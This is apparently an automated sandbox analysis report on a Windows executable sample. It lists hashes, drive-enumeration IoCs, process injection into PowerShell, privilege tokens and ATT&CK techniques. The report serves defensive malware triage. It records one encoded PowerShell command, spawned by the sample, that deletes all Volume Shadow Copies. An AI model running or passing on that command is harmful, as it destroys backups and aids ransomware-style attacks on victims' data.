93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7

General

Target

93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
Size

4.5MB
MD5

be059dd5f3442f498bde97f69265ccbd
SHA1

28a8eae3633023961f3bcc3d473b0aa1943676c4
SHA256

93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7
SHA512

493de3059a33e9ce8bcf67dfea31af6525764917729aeb7705eec20ab78eae3d216ddc6d9d4bebcbf7fa7748e92aa4efa1f0dbcd4e67c142c8c33a317c7c421d

Score

6^/10

Malware Config

Signatures

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe

description	ioc	process
File opened (read-only)	\??\K:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\O:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\P:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\A:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\G:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\I:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\M:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\Q:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\T:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\V:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\W:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\B:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\H:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\Z:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\U:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\X:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\Y:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\E:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\N:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\L:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\R:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\S:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\F:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
File opened (read-only)	\??\J:	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exepowershell.exe

pid	process
872	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
872	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
2600	powershell.exe
2600	powershell.exe
2600	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	2600	powershell.exe
Token: SeBackupPrivilege	536	vssvc.exe
Token: SeRestorePrivilege	536	vssvc.exe
Token: SeAuditPrivilege	536	vssvc.exe

Suspicious use of WriteProcessMemory 2 IoCs

Processes:

93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe

description	pid	process	target process
PID 872 wrote to memory of 2600	872	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe	powershell.exe
PID 872 wrote to memory of 2600	872	93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe
"C:\Users\Admin\AppData\Local\Temp\93ce973daa9687f185966b3133f7003006655ec9d5bf3edb881efaf0e4fbafc7.exe"
1⤵
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:872

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:628

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:536

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2600-120-0x000001A7EEBD0000-0x000001A7EECA0000-memory.dmp

Filesize
832KB

Download
memory/2600-121-0x000001A7EEBD0000-0x000001A7EECA0000-memory.dmp

Filesize
832KB

Download
memory/2600-122-0x000001A7F2AA0000-0x000001A7F2AC2000-memory.dmp

Filesize
136KB

Download
memory/2600-127-0x000001A7F2C50000-0x000001A7F2CC6000-memory.dmp

Filesize
472KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads